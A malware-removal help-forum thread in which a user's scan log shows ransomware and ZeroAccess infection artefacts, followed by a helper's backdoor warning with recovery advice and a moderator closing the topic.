2014-09-07 00:21 - 2014-09-26 00:05 - 00000346 _____ () C:\Windows\Tasks\At1.job
2014-09-07 00:16 - 2014-09-08 21:58 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Vabuoq
2014-09-07 00:16 - 2014-09-08 19:46 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymekwea
2014-09-06 23:10 - 2014-09-06 23:10 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-06 23:10 - 2014-09-06 23:10 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-06 23:10 - 2014-09-06 23:10 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-06 23:06 - 2014-09-08 22:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Oppaekda
2014-09-06 23:05 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EbduHufvu
2014-09-06 22:50 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ugyldoz
2014-09-06 22:47 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EwrovBofre
2014-09-06 22:21 - 2014-09-11 14:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ozowweu
2014-09-06 22:20 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OsesoDnisi
2014-09-06 21:17 - 2014-09-06 21:17 - 00006144 __RSH () C:\Users\smotamedy\AppData\Roaming\{00006DF7-3334-60DC-FBCD-7BF237D757AA}.exe
2014-09-06 18:24 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Nasuqaw
2014-09-06 18:22 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OlupGawt
2014-09-06 18:17 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ynapocly
2014-09-06 18:14 - 2014-09-06 18:14 - 00000000 ____D () C:\ProgramData\IhegOhrab
2014-09-06 18:00 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Hykikeew
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:57 - 2014-09-08 10:23 - 00000000 ___HD () C:\0e31356
2014-09-06 17:57 - 2014-09-06 17:57 - 00000000 ____D () C:\ProgramData\UsmiTfow
2014-09-05 14:33 - 2014-09-05 14:33 - 00145488 _____ () C:\Windows\Minidump\090514-21075-01.dmp
2014-09-04 08:19 - 2014-09-27 17:57 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-04 08:19 - 2014-09-04 08:19 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-04 08:19 - 2014-09-04 08:19 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-27 17:56 - 2014-01-31 12:51 - 01195387 _____ () C:\Windows\WindowsUpdate.log
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:50 - 2011-02-01 17:06 - 00000000 ____D () C:\Users\smotamedy\Tracing
2014-09-27 16:49 - 2014-04-09 17:55 - 00004348 _____ () C:\Windows\setupact.log
2014-09-27 16:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-27 15:19 - 2014-01-29 13:07 - 00000000 ____D () C:\ali
2014-09-27 15:00 - 2010-09-03 03:08 - 00000332 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-09-27 14:49 - 2013-07-23 10:22 - 00000000 ____D () C:\ProgramData\evwqqrk
2014-09-27 14:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Speech
2014-09-27 14:48 - 2014-01-30 13:01 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\JAM Software
2014-09-27 14:48 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ezrige
2014-09-27 14:11 - 2009-07-21 00:30 - 00782154 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-24 19:09 - 2010-11-01 09:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Skype
2014-09-17 10:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-14 09:00 - 2010-09-03 03:08 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-09-09 12:17 - 2009-07-13 23:53 - 00032574 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-09 11:44 - 2010-10-29 15:17 - 00000000 ____D () C:\Users\administrator
2014-09-08 22:36 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Heyqu
2014-09-08 22:30 - 2011-09-06 17:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Mozilla
2014-09-08 22:27 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Fioval
2014-09-08 22:12 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Altyc
2014-09-08 22:02 - 2010-12-03 11:16 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\webex
2014-09-08 21:26 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Adobe
2014-09-08 21:05 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\DesktopPwrMgr
2014-09-08 20:57 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Odpya
2014-09-08 20:47 - 2012-11-14 13:39 - 00000000 ___HD () C:\Users\smotamedy\AppData\Roaming\AC8087BE
2014-09-08 18:52 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Macromedia
2014-09-08 17:47 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Aptu
2014-09-07 03:15 - 2010-10-30 15:16 - 00000176 _____ () C:\Windows\system32\config\netlogon.ftl
2014-09-07 01:28 - 2011-09-06 15:06 - 00000536 _____ () C:\Users\smotamedy\UpToDateDesktop_stout.txt
2014-09-07 01:28 - 2010-11-01 09:20 - 00000000 ____D () C:\Users\smotamedy\UpToDate
2014-09-07 01:28 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy
2014-09-07 01:27 - 2012-03-03 11:31 - 00032280 ____N () C:\Users\smotamedy\Documents\Jan expenses 2012.xls
2014-09-07 01:27 - 2011-12-02 13:10 - 00012312 ____N () C:\Users\smotamedy\Documents\October_2011.xlsx
2014-09-07 01:27 - 2011-07-18 14:50 - 00033816 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 11 11 thru 07 15 11.xls
2014-09-07 01:27 - 2011-07-18 14:50 - 00016664 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 04 11 thru 07 08 11.xls
2014-09-07 01:27 - 2011-05-23 12:24 - 00512024 ____N () C:\Users\smotamedy\Documents\MD stats 2010 (9).xls
2014-09-07 01:26 - 2013-07-15 12:31 - 08812568 _____ () C:\Users\smotamedy\Desktop\River Oaks Beauty and Wellness Group (Backup Jul 15,2013  12 30 PM).QBB
2014-09-07 01:26 - 2012-01-05 18:53 - 00030744 ____N () C:\Users\smotamedy\Documents\dec 2011 colection expenses.xls
2014-09-07 01:26 - 2011-12-20 18:38 - 00022552 _____ () C:\Users\smotamedy\Documents\expenses for 2011-2012.xls
2014-09-07 01:26 - 2011-12-02 13:19 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000024.xls
2014-09-07 01:26 - 2011-12-02 13:13 - 00012312 ____N () C:\Users\smotamedy\Documents\collection,expenses Oct 2011.xlsx
2014-09-07 01:26 - 2011-12-02 12:41 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000021.xls
2014-09-07 01:26 - 2011-12-02 11:48 - 00031256 ____N () C:\Users\smotamedy\Documents\Collection,expenses Nov 2011.xls
2014-09-07 01:26 - 2011-07-07 11:41 - 00014616 ____N () C:\Users\smotamedy\Documents\cleaning duties.xls
2014-09-07 01:21 - 2013-07-10 11:58 - 00000000 ____D () C:\Users\Public\Documents\Intuit
2014-09-07 01:21 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-06 23:10 - 2013-07-10 11:58 - 00000000 ____D () C:\ProgramData\Intuit
2014-09-06 23:10 - 2010-09-03 03:39 - 00000000 ____D () C:\ProgramData\Lenovo
2014-09-06 23:10 - 2010-09-03 03:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-06 23:06 - 2009-07-21 01:20 - 00000000 ____D () C:\SWTOOLS
2014-09-06 23:05 - 2010-09-03 03:09 - 00000000 ___HD () C:\ProgramData\DDNI
2014-09-06 17:58 - 2010-10-30 11:03 - 00000000 ____D () C:\Users\admin
2014-09-06 17:57 - 2009-07-21 01:20 - 00008728 __RSH () C:\BOOTSECT.BAK
2014-09-05 14:33 - 2011-10-31 10:33 - 1273454962 _____ () C:\Windows\MEMORY.DMP
2014-09-05 14:33 - 2011-10-31 10:33 - 00000000 ____D () C:\Windows\Minidump
 
ZeroAccess:
C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51
 
ZeroAccess:
C:\$Recycle.Bin\S-1-5-18\$0a1e85f3e1cd51d1261ae5ea5aa3df51
 
Files to move or delete:
====================
C:\ProgramData\bw5EWA37M.dat
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At11.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At15.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At17.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At19.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At21.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At23.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At25.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At27.job
C:\Windows\Tasks\At28.job
C:\Windows\Tasks\At29.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At30.job
C:\Windows\Tasks\At31.job
C:\Windows\Tasks\At32.job
C:\Windows\Tasks\At33.job
C:\Windows\Tasks\At34.job
C:\Windows\Tasks\At35.job
C:\Windows\Tasks\At36.job
C:\Windows\Tasks\At37.job
C:\Windows\Tasks\At38.job
C:\Windows\Tasks\At39.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At40.job
C:\Windows\Tasks\At41.job
C:\Windows\Tasks\At42.job
C:\Windows\Tasks\At43.job
C:\Windows\Tasks\At44.job
C:\Windows\Tasks\At45.job
C:\Windows\Tasks\At46.job
C:\Windows\Tasks\At47.job
C:\Windows\Tasks\At48.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At5.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job
C:\Windows\Tasks\At52.job
C:\Windows\Tasks\At53.job
C:\Windows\Tasks\At54.job
C:\Windows\Tasks\At55.job
C:\Windows\Tasks\At56.job
C:\Windows\Tasks\At57.job
C:\Windows\Tasks\At58.job
C:\Windows\Tasks\At59.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At60.job
C:\Windows\Tasks\At61.job
C:\Windows\Tasks\At62.job
C:\Windows\Tasks\At63.job
C:\Windows\Tasks\At64.job
C:\Windows\Tasks\At65.job
C:\Windows\Tasks\At66.job
C:\Windows\Tasks\At67.job
C:\Windows\Tasks\At68.job
C:\Windows\Tasks\At69.job
C:\Windows\Tasks\At7.job
C:\Windows\Tasks\At70.job
C:\Windows\Tasks\At71.job
C:\Windows\Tasks\At72.job
C:\Windows\Tasks\At73.job
C:\Windows\Tasks\At74.job
C:\Windows\Tasks\At75.job
C:\Windows\Tasks\At76.job
C:\Windows\Tasks\At77.job
C:\Windows\Tasks\At78.job
C:\Windows\Tasks\At79.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At80.job
C:\Windows\Tasks\At81.job
C:\Windows\Tasks\At82.job
C:\Windows\Tasks\At83.job
C:\Windows\Tasks\At84.job
C:\Windows\Tasks\At85.job
C:\Windows\Tasks\At86.job
C:\Windows\Tasks\At87.job
C:\Windows\Tasks\At88.job
C:\Windows\Tasks\At89.job
C:\Windows\Tasks\At9.job
C:\Windows\Tasks\At90.job
C:\Windows\Tasks\At91.job
C:\Windows\Tasks\At92.job
C:\Windows\Tasks\At93.job
C:\Windows\Tasks\At94.job
C:\Windows\Tasks\At95.job
C:\Windows\Tasks\At96.job
 
 
Some content of TEMP:
====================
C:\Users\smotamedy\AppData\Local\Temp\SHSetup.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-26 00:05
 
==================== End Of Log ============================

 

Addition.txt

Link to post
Share on other sites
LiquidTension

LiquidTension

Posted
Posted

Hello aagah, welcome to Malwarebytes' Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that.    :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please read through my instructions thoroughly, and ensure you carry out each step in the order specified.
  • Please do not post logs using the CODEQUOTE or ATTACHMENT format. Logs should be posted directly in plain text. If you receive an error whilst posting, please break the log in half and use multiple posts.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation & providing the best set of instructions for you.
  • Please backup important documents before proceeding with my instructions.
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before you run anything.
  • Topics are locked if no response is made after 4 days. Please inform me if you will require additional time to complete my instructions.
     

======================================================
 
Your machine is heavily infected. As such, I must unfortunately issue you the following warning. Please let me know how you wish to proceed. 
 

goGMWSt.gifBACKDOOR WARNING
 
------------------------------
 
One or more of the identified infections is known to use a backdoor, that allows attackers to remotely control your computer, download/execute files and steal critical system, financial and personal information.
 
Please disconnect your computer from the internet immediately. If your computer was used for online banking, has credit card information or other sensitive data, using a non-infected computer/device you should immediately change all account information (including those used for banking, email, eBay, paypal, online forums, etc).Consider these accounts already compromised.
 
If you have used a router, you will need to reset it with a strong logon/password to ensure the malware cannot gain control before connecting again. Banking and credit card institutions should be notified of the possible security breach immediately. Please read the following for more information: How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
 
Whilst the identified infection(s) can be removed, there is no way to guarantee that your computer will be trustworthy again. This is due to the nature of the infection, which allows the attacker complete control over the computer. Many experts in the security community believe that once infected with this type of malware, the best course of action is to reformat the hard drive and reinstall the Operating System. Please read the following articles for more information.

Please let me know how you wish to proceed, and if you have any questions.
Link to post
Share on other sites
  • Root Admin
AdvancedSetup

AdvancedSetup

Posted
  • Root Admin
Posted

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.